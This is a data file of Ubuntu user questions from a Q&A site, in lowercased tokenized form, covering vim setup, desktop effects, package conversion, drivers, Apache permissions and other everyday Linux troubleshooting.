24967	how to select the first ocurrence in the auto-completion menu by pressing enter ?	every time there 's is a pop up menu . i select the first occurrence and press enter but nothing happens ( the word is not completed with he selected occurrence ) . the only way is to press tab until you reach the term for a second time . is there a way of selecting the first occurrence pressing enter ( or other vim hotkey ) ? my .vimrc : '' shortcuts nnoremap < f4 > : set filetype=html < cr > nnoremap < f5 > : set filetype=php < cr > nnoremap < f3 > : tlisttoggle < cr > '' press space to turn off highlighting and clear any message already displayed . nnoremap < silent > < space > : nohlsearch < bar > : echo < cr > '' set buffers commands nnoremap < silent > < m-f8 > : bufexplorer < cr > nnoremap < silent > < f8 > : bn < cr > nnoremap < silent > < s-f8 > : bp < cr > '' open nerdtree with start directory : d : \wamp\www nnoremap < f9 > : nerdtree /home/alex/www < cr > '' open mru nnoremap < f10 > : mru < cr > '' open current file ( silently ) nnoremap < silent > < f11 > : let old_reg= @ '' < cr > : let @ '' =substitute ( expand ( `` % : p '' ) , `` / '' , `` \\ '' , `` g '' ) < cr > : silent ! ! cmd /cstart < c-r > < c-r > '' < cr > < cr > : let @ '' =old_reg < cr > '' open current file in localhost ( default browser ) nnoremap < f12 > : ! start `` http : //localhost '' file : /// '' % : p '' '' < cr > '' open vim 's default explorer nnoremap < silent > < f2 > : explore < cr > nnoremap < c-f2 > : % s/\.html/.php/g < cr > '' remapping '' map leader to , let mapleader = `` , '' '' remap ` to ' nnoremap ' ` nnoremap ` ' '' remap increment numbers nnoremap < c-kplus > < c-a > '' compression function js_css_compress ( ) let cwd = expand ( ' < afile > : p : h ' ) let nam = expand ( ' < afile > : t : r ' ) let ext = expand ( ' < afile > : e ' ) if -1 == match ( nam , `` [ \._ ] src $ '' ) let minfname = nam. '' .min . `` .ext else let minfname = substitute ( nam , `` [ \._ ] src $ '' , `` '' , `` g '' ) . '' . `` .ext endif if ext == 'less' if executable ( 'lessc ' ) cal system ( 'lessc '.cwd.'/'.nam.'.'.ext . ' & ' ) endif else if filewritable ( cwd . '/'.minfname ) if ext == 'js ' & & executable ( 'closure-compiler ' ) cal system ( 'closure-compiler -- js '.cwd.'/'.nam.'.'.ext . ' > '.cwd.'/'.minfname . ' & ' ) elseif executable ( 'yuicompressor ' ) cal system ( 'yuicompressor '.cwd.'/'.nam.'.'.ext . ' > '.cwd.'/'.minfname . ' & ' ) endif endif endif endfunction autocmd filewritepost , bufwritepost *.js : call js_css_compress ( ) autocmd filewritepost , bufwritepost *.css : call js_css_compress ( ) autocmd filewritepost , bufwritepost *.less : call js_css_compress ( ) '' gui '' taglist right side let tlist_use_right_window = 1 '' hide tool bar set guioptions-=t '' remove scroll bars set guioptions+=llrrb set guioptions-=llrrb '' set the initial size of window set lines=46 columns=180 '' set default font set guifont=monospace '' set guifont=monospace\ 10 '' show line number set number '' set default theme colorscheme molokai-2 '' encoding set encoding=utf-8 setglobal fileencoding=utf-8 bomb set fileencodings=ucs-bom , utf-8 , latin1 '' scss syntax highlight au bufread , bufnewfile *.scss set filetype=scss '' less syntax highlight syntax on au bufnewfile , bufread *.less set filetype=less '' haml syntax highlight '' au ! bufread , bufnewfile *.haml '' setfiletype haml '' sass syntax highlight '' au ! bufread , bufnewfile *.sass '' setfiletype sass '' set filetype indent filetype indent on '' for snipmate to work filetype plugin on '' show breaks set showbreak= -- -- - > '' coding format set tabstop=4 set shiftwidth=4 set linespace=1 '' config '' set location of ctags let tlist_ctags_cmd= 'd : \ctags58\ctags.exe' '' keep the buffer around when left set hidden '' enable matchit plugin source $ vimruntime/macros/matchit.vim '' folding set foldmethod=marker set foldmarker= { , } let g : foldmethod = 0 map < leader > ff : call togglefold ( ) < cr > fun ! togglefold ( ) if g : foldmethod == 0 exe 'set foldmethod=indent' let g : foldmethod = 1 else exe 'set foldmethod=marker' let g : foldmethod = 0 endif endfun '' save and restore folds when a file is closed and re-opened '' au bufwrite ? * mkview '' au bufread ? * silent loadview '' auto-open nerdtree everytime vim is invoked au vimenter * nerdtree /home/alex/www '' set omnicomplete autocmd filetype python set omnifunc=pythoncomplete # complete autocmd filetype javascript set omnifunc=javascriptcomplete # completejs autocmd filetype html set omnifunc=htmlcomplete # completetags autocmd filetype css set omnifunc=csscomplete # completecss autocmd filetype xml set omnifunc=xmlcomplete # completetags autocmd filetype php set omnifunc=phpcomplete # completephp autocmd filetype c set omnifunc=ccomplete # complete '' remove trailing white-space once the file is saved au bufwritepre * silent g/\s\+ $ /s/// '' use ctrl-s for saving , also in insert mode noremap < c-s > : update ! < cr > vnoremap < c-s > < c-c > : update ! < cr > inoremap < c-s > < c-o > : update ! < cr > '' default set nocompatible source $ vimruntime/vimrc_example.vim '' source $ vimruntime/mswin.vim '' behave mswin '' disable creation of swap files set noswapfile '' no back ups wwhile editing set nowritebackup '' disable creation of backups set nobackup '' no file change pop up warning autocmd filechangedshell * echohl warningmsg | echo `` file changed shell . '' | echohl none set diffexpr=mydiff ( ) function mydiff ( ) let opt = '-a -- binary ' if & diffopt =~ 'icase ' | let opt = opt . '-i ' | endif if & diffopt =~ 'iwhite ' | let opt = opt . '-b ' | endif let arg1 = v : fname_in if arg1 =~ ' ' | let arg1 = ' '' ' . arg1 . ' '' ' | endif let arg2 = v : fname_new if arg2 =~ ' ' | let arg2 = ' '' ' . arg2 . ' '' ' | endif let arg3 = v : fname_out if arg3 =~ ' ' | let arg3 = ' '' ' . arg3 . ' '' ' | endif let eq = '' if $ vimruntime =~ ' ' if & sh =~ '\ < cmd' let cmd = ' '' '' ' . $ vimruntime . '\diff '' ' let eq = ' '' ' else let cmd = substitute ( $ vimruntime , ' ' , ' '' ' , '' ) . '\diff '' ' endif else let cmd = $ vimruntime . '\diff' endif silent execute ' ! ' . cmd . ' ' . opt . arg1 . ' ' . arg2 . ' > ' . arg3 . eq endfunction
24969	how to install the taglist plugin in vim ?	i downloaded the taglist plugin and extracted it in my .vim folder . i also installed exuberant-ctags from synaptic . i did : tlisttoggle but it gives me the following message : /bin/bash : d : ctags58ctags.exe : command not found am i missing something ? any suggestions ?
24972	how to enable the config_pm_advanced_debug kernel configuration option	i 'm trying to save the battery power . for that i 'm using powertop and one suggestion is `` enable the config_pm_advanced_debug kernel configuration option. '' . i have no idea how to make this .
24973	release of ubuntu one server code ?	will ubuntu one 's server code ever be released so that people can run their own private `` ubuntu one '' ?
24977	why does ubuntu use two window managers : compiz and metacity ?	i 'm a bit confused about this one . does ubuntu use two different window managers at the same time ?
24982	is there a list , directory , or review of ppas that is worth a look ? or can you share links to some notable ppas that you know of or use ?	imho a list of well-maintained ppas is a useful commodity for a ubuntu user to have . perhaps some of you have links of this kind to share ? or maybe you 've seen a review or list of ppas ( a blog post maybe ) by someone , or some kind of ppa directory , etc. ? i am especially interested in fresh and useful packages targeting 10.04 , 10.10 and 11.04 .
24983	how do i reinstall default fonts ?	i have deleted the default fonts in ubuntu desktop 10.10 . ie , arial , verdana , etc . does anyone know how i can get them back ?
24984	compiz runs almost at 100 % and the system is slow , what can i do ?	my system became very slow out of the sudden , yesterday compiz was running extremely smooth , today it started working very slow and slowing the computer . what i 've done so far was to resize my swap partition to 6 gigabytes ( my computer has 3 gigabytes of ram ) , before it was on 5.1 gigabytes , so i though that was the reason of this but still not . also i tested running only metacity by running metacity -- replace and also with mutter . with metacity works really great no problem but , in the other hand , with mutter the computer works slower than running compiz instead . i am using the nvidia driver version 173.14.28 and my x server version as reports the nvidia x server settings is the 11.0 . my linux kernel running on this computer is 2.6.35-25-generic and my ubuntu version is 10.10 . any help will be appreciated .
24990	installing the wacom bamboo pen & touch	i would like to use the wacom bamboo `` pen & touch '' with ubuntu maverick and i do n't have any idea how to do this . in addition , when i see `` change or add kernel '' i become really scared . : - ) i would really appreciate your help . thanks in advance i saw answers for the wacom bamboo `` pen '' but i do n't know if the installation instructions are the same or if some different additions need to be made to my system .
24994	ppa for mysql 5.5 underway ?	are there any efforts in this direction ? postgresql 9.0 is already available via ppa , what about mysql ? would be rather interesting .
25011	mobile broadband not connecting	my bsnl cdma 1x is detected in ubuntu 10.10 . when i am trying to connect with it ( after required settings - user id & password ) , after about a minute networkmanager displays a message `` network disconnected - you are offline '' . what may be the reason ? now i am working with the same device in windows . i just installed ubuntu 10.10 with windows . please help me .
25015	alternative printing method ( s ) for an unsupported printer	i have in my office , a konica minolta bizhub 211 multifunction printer , it works well with windows workstations ... it has a lot of good features , like duplex ... i have n't found any drivers for unix , so i 'm looking for alternative methods , how can we make it useable in ubuntu . i 'm thinking on some windows based server , or what i know ... it 's id in lsusb : 132b:2052 i wrote here requesting for drivers : ubuntu.hu , linuxforums.org , forums.debian.net , ubuntuforums.org ; and also to the manufacturer , but they said only , that `` the first postscript supported printer is only bizhub 223 '' , so they do n't care that thing . update : i 've heared about the raw printing method trough a normal windows workstation . have someone got any information about this workaround ? please suggest working methods , thanks , b. roland
25021	sound card with 8 line-in	what soud card with 8 line-in can you recommend for ubuntu ? it can be an internal one or usb/firewire .
25022	how to enable boot messages to be printed on screen during boot up ?	how to enable boot messages , kernel messages and other logs of various services to be printed on screen during boot up ?
25025	does anyone know of a wireless n card that works out of the box ?	so far i have tried : tenda w322p addon add-nwp210 neither work on meerkat . both worked out the box with windows 7 .
25031	alien deletes .deb when converting from .rpm	i 'm trying to convert .rpm to .deb using alien . sudo alien -k libtetra-1.0.0-2.i386.rpm alien says that : libtetra-1.0.0-2.i386.deb generated but when i check the folder - there is just original .rpm and no .deb . also - i can see that for a split second there is a .deb file in a folder . so it looks like alien create .deb and deletes it right away . i suspect that it 's maybe because i run 64 bit os and package is 32 ? can somebody explain why alien deletes .deb automatically ? verbose output : lang=c rpm -qp -- queryformat % { name } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { version } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { release } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { arch } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { changelogtext } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { summary } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { description } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { prefixes } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { postin } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { postun } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { preun } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { license } libtetra-1.0.0-2.i386.rpm lang=c rpm -qp -- queryformat % { prein } libtetra-1.0.0-2.i386.rpm lang=c rpm -qcp libtetra-1.0.0-2.i386.rpm rpm -qpi libtetra-1.0.0-2.i386.rpm lang=c rpm -qpl libtetra-1.0.0-2.i386.rpm mkdir libtetra-1.0.0 chmod 755 libtetra-1.0.0 rpm2cpio libtetra-1.0.0-2.i386.rpm | lzma -t -q > /dev/null 2 > & 1 rpm2cpio libtetra-1.0.0-2.i386.rpm | ( cd libtetra-1.0.0 ; cpio -- extract -- make-directories -- no-absolute-filenames -- preserve-modification-time ) 2 > & 1 chmod 755 libtetra-1.0.0/./ chmod 755 libtetra-1.0.0/./usr chmod 755 libtetra-1.0.0/./usr/lib chown 0:0 libtetra-1.0.0//usr/lib/libtetra.so.1.0.0 chmod 755 libtetra-1.0.0//usr/lib/libtetra.so.1.0.0 mkdir libtetra-1.0.0/debian date -r date -r chmod 755 libtetra-1.0.0/debian/rules debian/rules binary 2 > & 1 libtetra_1.0.0-3_i386.deb generated find libtetra-1.0.0 -type d -exec chmod 755 { } ; rm -rf libtetra-1.0.0 very verbose output lang=c rpm -qp -- queryformat % { name } libtetra-1.0.0-2.i386.rpm libtetra lang=c rpm -qp -- queryformat % { version } libtetra-1.0.0-2.i386.rpm 1.0.0 lang=c rpm -qp -- queryformat % { release } libtetra-1.0.0-2.i386.rpm 2 lang=c rpm -qp -- queryformat % { arch } libtetra-1.0.0-2.i386.rpm i386 lang=c rpm -qp -- queryformat % { changelogtext } libtetra-1.0.0-2.i386.rpm - first rpm package lang=c rpm -qp -- queryformat % { summary } libtetra-1.0.0-2.i386.rpm panasonic kx-mc6000 series printer driver for linux . lang=c rpm -qp -- queryformat % { description } libtetra-1.0.0-2.i386.rpm this software is panasonic kx-mc6000 series printer driver for linux . you can print from applications by using cups ( common unix printing system ) which is the printing system for linux . other functions for kx-mc6000 series are not supported by this software . lang=c rpm -qp -- queryformat % { prefixes } libtetra-1.0.0-2.i386.rpm ( none ) lang=c rpm -qp -- queryformat % { postin } libtetra-1.0.0-2.i386.rpm ( none ) lang=c rpm -qp -- queryformat % { postun } libtetra-1.0.0-2.i386.rpm ( none ) lang=c rpm -qp -- queryformat % { preun } libtetra-1.0.0-2.i386.rpm ( none ) lang=c rpm -qp -- queryformat % { license } libtetra-1.0.0-2.i386.rpm gpl and lgpl ( version2 ) lang=c rpm -qp -- queryformat % { prein } libtetra-1.0.0-2.i386.rpm ( none ) lang=c rpm -qcp libtetra-1.0.0-2.i386.rpm rpm -qpi libtetra-1.0.0-2.i386.rpm name : libtetra relocations : ( not relocatable ) version : 1.0.0 vendor : panasonic communications co. , ltd. release : 2 build date : tue 27 apr 2010 05:16:40 am edt install date : ( not installed ) build host : localhost.localdomain group : system environment/daemons source rpm : libtetra-1.0.0-2.src.rpm size : 31808 license : gpl and lgpl ( version2 ) signature : ( none ) url : http : //panasonic.net/pcc/support/fax/world.htm summary : panasonic kx-mc6000 series printer driver for linux . description : this software is panasonic kx-mc6000 series printer driver for linux . you can print from applications by using cups ( common unix printing system ) which is the printing system for linux . other functions for kx-mc6000 series are not supported by this software . lang=c rpm -qpl libtetra-1.0.0-2.i386.rpm /usr/lib/libtetra.so /usr/lib/libtetra.so.1.0.0 mkdir libtetra-1.0.0 chmod 755 libtetra-1.0.0 rpm2cpio libtetra-1.0.0-2.i386.rpm | lzma -t -q > /dev/null 2 > & 1 rpm2cpio libtetra-1.0.0-2.i386.rpm | ( cd libtetra-1.0.0 ; cpio -- extract -- make-directories -- no-absolute-filenames -- preserve-modification-time ) 2 > & 1 63 blocks chmod 755 libtetra-1.0.0/./ chmod 755 libtetra-1.0.0/./usr chmod 755 libtetra-1.0.0/./usr/lib chown 0:0 libtetra-1.0.0//usr/lib/libtetra.so.1.0.0 chmod 755 libtetra-1.0.0//usr/lib/libtetra.so.1.0.0 mkdir libtetra-1.0.0/debian date -r mon , 07 feb 2011 11:03:58 -0500 date -r mon , 07 feb 2011 11:03:58 -0500 chmod 755 libtetra-1.0.0/debian/rules debian/rules binary 2 > & 1 dh_testdir dh_testdir dh_testroot dh_clean -k -d dh_clean : no packages to build . dh_installdirs dh_installdocs dh_installchangelogs find . -maxdepth 1 -mindepth 1 -not -name debian -print0 | \ xargs -0 -r -i cp -a { } debian/ dh_compress dh_makeshlibs dh_installdeb dh_shlibdeps dh_gencontrol dh_md5sums dh_builddeb libtetra_1.0.0-2_i386.deb generated find libtetra-1.0.0 -type d -exec chmod 755 { } ; rm -rf libtetra-1.0.0 resolution oh well . it looks like it 's perhaps a bug ? or i do n't know . i simply installed 32-bit version of ubuntu in virtualbox and converted package there . for some reason i could n't convert 32-bit package in 64 os . and that is that . if someone ever finds the reason ffor this behavior - plz . post somewhere in comments . thanks
25032	apache not accepting a path in my home folder	i have trying to set up an apache site to use a folder in my home folder without any success . i exactly followed the steps in this page : https : //help.ubuntu.com/community/apachemysqlphp yet i did not succeed ; i keep getting error 403 , which says that the server does n't have permission to access the requested page . i searched forums and many suggested changing the permission of the folder . i went straight away and set the permission to 777 , but that did n't solve the problem . i made another search and somebody gave me a clue , which is that it could be because my home folder is encrypted . i believe this could be the problem , but : what is the relation between encryption and apache ? i suppose apache server is requesting the file from the system , rather than trying to access the file bytes ! is there anyway to solve this problem ? i do n't want to move the folder to /var/www because i am using this apache for testing , so i want whatever change i make to be immediately reflected , rather than having to copy files which is error prone .
25033	greek letters rendered incorrectly in libreoffice	using an old archive that i have ( with maxwell 's equations ) , the greek letters display as squares . i tried to change something in the alphabet but even the fonts do n't have any greek letters ( they appear like squares too ) , both greek and igreek letters packages . sounds like a package that 's not installed , or corrupted . i still re-downloaded and reinstalled libreoffice . i do n't know what i have to install . the equations look fine in openoffice.org ( i made the file with it ) . what should i do ?
25036	how to enable voice chat in kopete chat client ?	hhow do i enable voice chat in kopete chat client ? i am using kopete for yahoo ! and gmail , please help me to enable voice chat for the yahoo ! account .
25038	making files generally available on linux system ( when security is relatively unimportant ) ?	i am using ubuntu 9.10 on a stationary pc . i have a secondary 1 tb harddrive with a single big logical partition ( currently formatted as ext4 ) . it is mounted as /usr3 with options user , exec in /etc/fstab . i am doing highspeed imaging experiments . well , only 260fps , but that still creates many individual files since each frames is saved as one png-file . the stationary is not used by anyone other than me which is why the default security model posed by ubuntu is not necessary . what is the best way to make the entire contents of /usr3 generally available on all systems . in case i need to move the harddrive to another ubuntu 9.x or 10.x machine ? when grabbing image with the firewire camera i use a selfmade grabbing software-utility ( console based ) in sudo-mode . this creates all files with root as owner and group . i am logged in as user otb and usually i do the following when having to make files generally available to otb : sudo chown otb -r * sudo chgrp otb -r * sudo chmod a=rwx -r * this takes some time since the disk now contains individual ~200000 files . after this , how would linux behave if i moved the harddrive to another system where the user otb is also available ? would the files still be accessible without sudo use ?
25039	desktop effects could not be enabled when i try to enable visual effects . this is a virtualbox 4.0.2 guest	i am running on a windows 7 64 bit host . running virtualbox 4.0.2 running ubuntu 10.10 64 bit guest . running virtualbox guest additions 4.0.2 - i ran the 4.0.2 .run file i got from virtualbox downloads . compiz/emerald are installed . this is driving me crazy . this should take 20 minutes to setup . but after 4 hours i need help .
25041	how to have similar sound quality in banshee and rhythmbox ( or totem ) ?	i am running ubuntu 10.10 on an acer aspire 6390g . with its 5.1 embedded sound system , this laptop is good at playing music using in-built speakers . the soundcard is an hda-intel alc888 . when i use rhythmbox ( version 0.13.1 ) ( or totem ) ( and the in-built speakers ) , the sound is deep , warm , great . but with banshee ( version 1.8.0 . ) , it is always crispy and basically of poor quality when the banshee equalizer is disabled . i know that it is possible to fine tune banshee sound using the equalizer , but after some time spent trying to properly adjust it without success , i decided to ask this question on askubuntu.com . is there a way to get the same sound quality in banshee as in rhythmbox ( or totem ) or keeping on adjusting banshee equalizer is the only alternative to try to solve this problem ? ( if the answer is the latter , is there anyone who would be kind enough to provide me his equalizer settings ? ) thanks all for your answers .
25046	chrome is slow when opening or closing tabs	chrome works alright on my netbook except when opening and closing tabs . opening a tab is pretty slow . is this normal behavior or can i fix it ? i am using the latest dev version but the problem is n't unique to a version . it 's always like this .
25053	ca n't change brightness on packard bell lm86	i got a packard bell easynote lm86 and the problem is i can not set the brightness . i have tried with both the hotkeys which is fn and either f11 to turn down and f12 to turn up . i have also tried through the command line by doing echo 50 > /proc/ ... and also tried through the gnome brightness applet .
25055	problem opening sfx archive file ( .exe ) using the archive manager	i have installed both rar and unrar using apt-install but i am still not able to use archive manager for opening the archive file.. i have also tried installing p7zip ( p7zip-full and p7zip ) but no improvements ... however , when i use command-line for extracting the files from the archive using unrar or rar the command executes successfully ... is there any other open source software i should install for viewing the contents of the sfx archive or what else should i install to view the same in the archive manager.. thanks in advance ...
25058	how can i extract .bin ( image ) files ?	i need to extract a .bin file and i have no idea how to do it in ubuntu . in windows i usually used to do it using magiciso .
25059	which bookmark sync technology will be used in 11.04 ?	i assume 11.04 is going to use firefox 4 , is ubuntu going to keep using ubuntu one sync or are they going to change over to the firefox sync built into 4.0 ?
25064	how do i bind another key to be return ?	my enter key recently broke and i was wondering if i could bind it to a different key in gnome . does anyone know how i would go about doing this ?
25066	link windows mobile device with ubuntu and use laptop to send sms	is there any software that i can use on my ubuntu laptop to write sms on my windows mobile 6.1 htc touch diamond ?
25071	how to run a script when a specific flash-drive is mounted ?	is there a way to run a script when a particular usb device is mounted ? i keep my videos on a separate usb and would like to run a script that would mount the video folder on the usb device to the one in the home folder .
25072	how do i report a site that is misusing the ubuntu logo and trademark ?	ok while browsing for an answer to a problem mentioned here at askubuntu i found this site `` ubuntu addict '' which looks like a google advert driver . is there a place i can report something like that if i see it .
25075	how to get the touchpad working on acer extensa 5630	the touchpad on my acer extensa 5630z does not work . it used to work fine in windows 7 , but it has not worked since the moment i installed ubuntu . i 've tried installing synaptics driver using this command sudo apt-get install xserver-xorg-input-synaptics but it still does not work .
25077	how to really clear the terminal ?	i can issue the clear command or press ctrl + l to clear the current ubuntu terminal , but this just shifts previous output upwards and if you use mouse scroll or pgup and pgdown keys it 's hard to distinguish where the output of previous command ends and output of current command begins . is there a way to really clear the terminal so i wo n't see previous command results ? thanks : )
25088	keeping xv overlay configuration throughout an x session	after upgrading my linux system from ubuntu 9.04 to ubuntu 10.10 , i suceeded correcting most problems ( all related to intel 82865g integrated graphics adapter support and compiz is still not working but that 's another matter ) but for one i only have a partial solution . whenever i play a video the colors are much too saturated . this is really a problem for tones of skins that appears reddish ( everyone seems to be coming back from a ski vacation with deep sun burns ) . as this effect only occurs with videos , not with pictures , i finally figured out it was related to video overlays configuration and i can correct it typing : xvattr -a xv_saturation -v 120 this change the default saturation value , which is 500 and much too high in my case , at eye sight the correct value seems to be between 100 and 150 . now my problem is that i have to type the above command each time i run a video . if i type it before running the video it has no effect , if i close the video and open a new one , i have to type it again , etc . i tried to put it in xsession and ( logically ) it has no effect either . how could i do to get the correct setting whenever i run a video without typing the above command every time ?
25089	how can i read man pages in my native language ?	how can i read man pages in my mother tongue ? i 'd also like to contribute some translations . where should i go ? is there a community supported by canonical ?
25090	can you recommend a password generator ?	i was hoping someone could recommend a good password generator . extra props to the person who can name one that gives you a mnemonic to remember it as well .
25098	how do i install dig ?	how do i install dig ? i ca n't figure out what the package name is .
25102	will ubuntu work on a dell inspiron 15r ?	i want to know how to install ubuntu on a dell inspiron 15r with intel core i3 , 3gb ram , intel hd graphics and 320gb hdd . i 've heard some people have had issues with the wireless card . also , i tried a few days ago to install the 64-bit version of ubuntu 10.10 and the installaten hung on the `` who are you '' screen ... can anyone help me , i really want to get into linux but without having any problems with the laptops drivers .
25108	how do i connect my sixaxis playstation3 controller to my laptop ?	i have a lenovo x61t laptop and i 'd like to use a sony sixaxis playstation 3 bluetooth controller . how can i get the controller to talk to my laptop ?
25110	disable auto-mount for particular partitions on usb drives	i have a big usb disk with 3 partitions : one for backup and two other bootable ones for installing and testing new distros . i want the backup partition automounted on boot . but i do n't want the two test partitions automounted . despite my use of `` noauto '' in /etc/fstab , something ( gnome ? ) seems to be mounting them when i plug the drive it . label=mybook /srv/backup ext4 defaults 0 2 label=mybook-root /media/mybook-root ext4 user , noauto 0 2 label=mybook-spare /media/mybook-spare ext4 user , noauto 0 2 in previous ubuntu distributions it seems that it was possible to configure gnome so it would avoid mounting particular partitions on removable drives like usb : gnome-mount -- write-settings -- mount-options noauto -- device /dev/sda1 this is no longer available in lucid ( when did it go away ? ) is there another way to do this now ?
25112	how to disable window caption bar in gnu screen ?	i usually split my gnu screen into four regions , and i do n't really need the status bars for each of those windows . is there an option to disable gnu screen window status bars ? i could only find caption always|split only in the manual . thanks : )
25117	google chrome writing problem -- freezes up during typing	i use google chrome sometimes for googling . my problem occurs when i am entering text like a username , or comments . in the middle of writing , the typing progress freezes . to continue writing i have to minimize and then maximize google chrome . is there any solution for this ? i use 9.0.597.94 ( 73967 ) i also face this problem on the previous version to extensions yes i have the following extensions : auto copy , csscan , firebug lite for google chrome , remindme , and virtual keyboard ( by google ) . yes i use ubuntu standalone . additional details : using an ubuntu 10.10 ( english ) output of ps wwaux ( active processes ) output of dpkg -l ( installed packages )
25119	how to enable desktop effects on ubuntu 10.04 after upgrade from ubuntu 8.04 ?	i upgraded my ubuntu 8.04 to ubuntu 10.04 and when i try to enable desktop effects it says : desktop effects could not be enabled . the output of lspci | grep vga is : 00:02.0 vga compatible controller : intel corporation 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device ( rev 03 ) hardware drivers says there is no propriority hardware driver . i installed nvidia driver but i think my is an intel graphics device . please help .
25129	updating hp pavilion bios from linux	i have a hp pavilion dv6000 series ( dv6602 au ) laptop . i want to upgrade bios . i only have ubuntu installed in my system . is it possible to upgrade bios from ubuntu ? google search gave me some results but somewhere i read that recent updates are done from inside windows installation and not with a floppy .
25131	how to setup a git server ?	i am trying to setup a git server could . can anyone tell me how to set up a git server , so that client machines can connect to that server and make use of git version control for their projects ... please give me step by step instructions as i 'm new to this thing .
25133	how can i configure the embedded wireless card in a toshiba satellite pro 4600 to work ?	i 'm struggling to get the embedded wireless card in this laptop to work . in 7.10 ( gutsy ) it worked fine . now i 'm trying to get 10.10 ( maverick ) working on it , and am using the lubuntu flavour due to the low resources of this laptop . the hardware : appears to be an embedded pcmcia card . pccardctl ident gives : socket 0 : product info : `` toshiba '' , `` wireless lan card '' , `` version 01.01 '' , `` '' manfid : 0x0156 , 0x0002 function : 6 ( network ) the default kernel recognises the card and loads the orinoco_cs driver . orinoco_cs 0.0 : hardware identity 0005:0002:0001:0002 orinoco_cs 0.0 : station identity 001f:0001:0006:000e orinoco_cs 0.0 : firmware determined as lucent/agere 6.14 then for some reason , the driver is n't happy with this and gives : orinoco_cs 0.0 : hardware identity 0005:0002:0001:0002 orinoco_cs 0.0 : station identity 001f:0002:0009:0030 orinoco_cs 0.0 : firmware determined as lucent/agere 9.48 all seems ok until i try to associate with my access point using network manager . eth1 : lucent/agere firmware does n't support manual roaming repeated about 10 times then nm gives up . according to the linuxwireless.org wiki page on this driver , this is a known issue , and i quote : known issues roaming and wpa_supplicant lucent/agere firmware does n't support manual roaming on the agere cards , roaming is controlled by the firmware instead of userspace . you will get the above message if userspace attempts to associate with a specific ap rather than by ssid . if you are using wpa_supplicant use ap_scan=2 mode . networkmanager uses wpa_supplicant , so the above also applies . at this point my google-fu has failed me , and i ca n't find how to configure network manager to use the mystical `` ap_scan=2 '' mode via wpa_supplicant . i have tried the following suggested solutions ( from launchpad or the forums ) deleting the agere* files from /lib/firmware using wicd instead of network manager combining both blacklisting the orinoco_cs driver in an attempt to force use of the hostap_cs driver instead ( in case it is a prism2 card ) . obviously none of them have worked for me . any hints on how to perform the suggested workaround above ? edit : i have also confirmed working on 8.10 ( intrepid ) live cd .
25139	all video players display black screen	i 'm working in 10.04 lucid . all my video players ( movie player and vlc ) and the preview windows in editors ( openshot and pitivi ) will only display a black screen when playing a video . the sound is fine and the videos work fine on other computers . i have tried multiple formats from varying sources .mov taken from old ffmpeg projects , .avi straight from a camera , .mp4 using h.264 from openshot on another system , .ogv from a gtk-recordmydesktop session on this very computer . i even get a pure black screen in the viewer when starting a remote session in vnc . this box has a geforce 8400 gs using the proprietary nvidia drivers in case it may be a card problem or setting .
25142	where did playonlinux install microsoft office 2007 ?	after i installed playonlinux , i immediately installed the microsoft office 2007 . i pasted an .iso image on my desktop and extracted it on a folder , and after that i installed it using the playonlinux . after several loadings the playonlinux prompted installing internet explorer 6 and after that , it said that office 2007 was successfully installed , and i ca n't find where is office 2007 installed . can you help me ?
25158	software installed on root partition or on home partition	i am planning to install some big softwares such as matlab ( 4gb ) , mathematica ( 4gb ) on my ubuntu partitions . i was wondering if i installed them on my home partition , when i reinstall ubuntu without touching the home partition , will the softwares still be runnable after reinstallation ? what are the advantage and disadvantages of installing softwares on root partition and of on home partition ? with your answer to the previous questions , what are some reasonable plans for the sizes of root partition and of home partition ? note that i would like to learn programming in c , c++ , java , python , lisp , databases under both ubuntu and windows , and no games . my laptop has around 230 gb , where i plan to install both windows and ubuntu , and reserve 40 gb for ubuntu ( three partitions : swap , root and home ) , 110 gb for ntfs partition shared between the two oses , 70 gb for windows os partition , and 10 gb that can be added to any of the above partitions . i will change my plan according to your suggestions . thanks and regards !
25161	why does ls -lh give me ls : invalid option -- 'h '	i 'm using interpid ( i know i need to upgrade ) . when i try and use the -h option with ls i get an error . i swear this used to work , and the man page says it should . any ideas ? $ sudo ls -lh ls : invalid option -- 'h' try `ls -- help ' for more information .
25168	accessing second hard drive	so i recently installed ubuntu 10.10 64-bit on my computer . i installed it on my 60gb ssd hard drive , and in the installation it never acknowledged the existence of my second hard drive . the hard drive that i keep all my files on , and which i want to make my home folder if i can , is a western digital caviar black 1tb sata 6gb/s 64mb cache ( wd1002faex ) . i 've read the following : https : //help.ubuntu.com/community/mount but honestly can not work out how to access the hard drive from my ubuntu installation . i did have windows 7 64-bit prior to installing ubuntu . i have backed up all the files on the hard drive , but if i could just access them straight off that would be super cool . the following directories are currently in my /dev/ folder : ati/ , block/ , bsg/ , bus/ , char/ , cpu/ , isk/ , input/ , mapper/ , net/ , pktcdvd/ , pts/ , shm/ , snd/ , and usb/ result from sudo fdisk -l disk /dev/sda : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d2dfd device boot start end blocks id system /dev/sda1 * 1 6994 56174592 83 linux /dev/sda2 6994 7298 2438145 5 extended /dev/sda5 6994 7298 2438144 82 linux swap / solaris does anyone know how i can use the second hard drive ? @ djeykib so very close to fixing it.. unfortunately on the last command you gave it says this : $ sudo apt-get install linux-lts-backport-natty reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-lts-backport-natty checking on http : //www.ubuntuupdates.org/ppas reveals that it is only available for 10.04 . looks like i 'll have to unplug and re-plug hardware if i want it working still : (
25169	are there plans to add calendar and todo list sync in ubuntuone ?	files , contacts and notes are only half the truth . are there plans to add calendar and todo list sync for ubuntuone ? if yes , which client ? evolution ? thunderbird/lightning ? stand alone client like tomboy ?
